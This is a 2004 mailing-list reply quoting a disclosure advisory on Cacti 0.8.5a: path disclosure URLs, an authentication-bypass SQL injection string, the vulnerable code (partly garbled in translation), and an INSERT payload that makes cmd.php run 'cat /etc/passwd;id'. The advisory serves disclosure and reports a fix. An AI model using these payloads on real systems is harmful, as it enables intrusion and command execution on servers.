<<< Date Index >>>     <<< Thread Index >>>

Re: SQL Injection in CACTI



Does this work on 0.8.5?  I tried it and was unsuccessful.  Thanks.

Andy

On Monday 16 August 2004 01:11 pm, Fernando Quintero wrote:
> /////////////////////////////////////////////////////
> ////            Vulnerable Program: CACTI
> ////
> ////            Version : The latest version 0.8.5a
> ////
> ////            Url: http://www.raxnet.net
> ////
> ////            The Bug: SQL injection to allows bypass the auth.
> ////
> ////            Date: Today, August 16 off 2004
> ////
> ////            Author: Fernando Quintero (a.k.a nonroot)
> ////             Email: nando@xxxxxxxxxxx
>
>
> //////////////////////////////////////////////////////
>
>
> I. Affected software description:
>
> Cacti is a complete frontend to RRDTool, it stores all of the necessary
> information to create graphs and populate them
> with data in a MySQL database. The frontend is completely PHP driven.
> Along with being able to maintain Graphs, Data
> Sources, and Round Robin Archives in a database, cacti handles the data
> gathering. There is also SNMP support for
> those used to creating traffic graphs with MRTG.
>
> II. The BUgs
>
>
> a) Full path disclosure
>
> In several parts of the code when anyone try to open files in
> directories who do not appear at first like: include,
> lib, scripts, etc. an error appears allowing to see the route him where
> is installed the program. for example:
>
>  http://127.0.0.1/cacti/include/auth.php
>  http://127.0.0.1/cacti/auth_login.php?action=login
>  http://127.0.0.1/cacti2/auth_changepassword.php?ref=index
> php&action=changepassword&password=aaaaaa&confirm=aaaaaa&submit=Save
>
> These are low risk bugs, but similarly they allow to obtain data of the
> remote system to a possible attacker.
>
>
> b) SQL injection and bypass the authentication.
>
> Injection of code is possible in the index.php file to pass auth. When
> the username and the password are evaluated by
> auth_login.php, anyone can insert this:
>
> username = admin' or '6'='6
> password = password wished
>
> Where 'admin' is a user worth in cacti, the system allows this input and
> to change inmediatly the passowrd.
> this is the code:
>
> //auth_login.php
> // line 33 ~
>
>  switch ($_request["action" ])
>  {marries 'login': / * --- UPDATE old password with new md5 password
> value */
>
> db_execute("update user_auth Seth password = '" . md5($_POST["password"
> ]) . "' where username='" . $_post["username" ] . "' and password =
> PASSWORD (". $_POST["passw
> ord"] . "')");
>
> so, 'username' and 'password', can nevertheless be injected, this
> nonserious possible if the variable
> 'magic_quotes_gpc' it was to 'On' in the php.ini file of the system.
>
> Here is where enters debian. I it probe in SID with the latest version
> of cacti, When it's installed, a
> configuration file is created called cacti.conf in the route conf.d of
> the apache. This file contains the
> following information:
>
> ---BEGIN----
>
> Alias /cacti /usr/share/cacti
>
> <DirectoryMatch /usr/share/cacti/>
>         Options +FollowSymLinks
>         AllowOverride None
>         order allow,deny
>         allow from all
>         <IfModule mod_php4.c>
>                 AddType application/x-httpd-php .php
>                 php_flag magic_quotes_gpc Off
>                 php_flag short_open_tag On
>                 php_flag register_globals On
>                 php_flag register_argc_argv On
>                 php_flag track_vars On
>                 php_value include_path .
>                 DirectoryIndex index.php
>         </IfModule>
> </DirectoryMatch>
>
> -----END----
>
> magic_quotes_gpc is put in Off in the line:
>
> php_flag magic_quotes_gpc Off
>
> Of this form everything is had what it is needed to carry out a
> successful attack. Using this attack,
> I would to inject some code in the table 'data_input_data_cache' and it
> allowed me to execute a command in
> the system with permissions of the user who runs the apache.
>
> a possible example for this is:
> insert into data_input_data_cache (local_data_id, host_id,
> data_input_id, action, command, hostname, snmp_community,
> snmp_version, snmp_username, snmp_password, snmp_port, snmp_timeout,
> rrd_name, rrd_path, rrd_num, arg1, arg2, arg3)
> values ('9', '1', '7', '1', 'cat /etc/passwd;id;somecommand; some
> script', '127.0.0.1', '', '1', '', '', '161', '500',
> 'hack', '/', '3', 'NULL', 'NULL', 'NULL');
>
> then points to http://127.0.0.1/cacti/cmd.php and the command will be
> executed.
>
> III. SOLUTION:
>
> The coders where contacted and the code was fixed in the cvs ;).
> The mantainer of cacti was contacted too.
>
> IV. GREETINGS
>
>     - Greets All the community. I learn of you!
>     - Silence Team and the GIGAX Staff.
>
>
> V. CONTACT
>
> Fernando Quintero
> nando@xxxxxxxxxxx
> Silence Team
>
>
> VI. FINAL WORDS
>
> - Many applications would to be vulnerable with the configuration by
> default of debian, check it!.
>
> - Sorry by the english, so  !! Viva COLOMBIA !!
>
>
>
> Fernando Quintero
> Silence Team
> Colombia - South America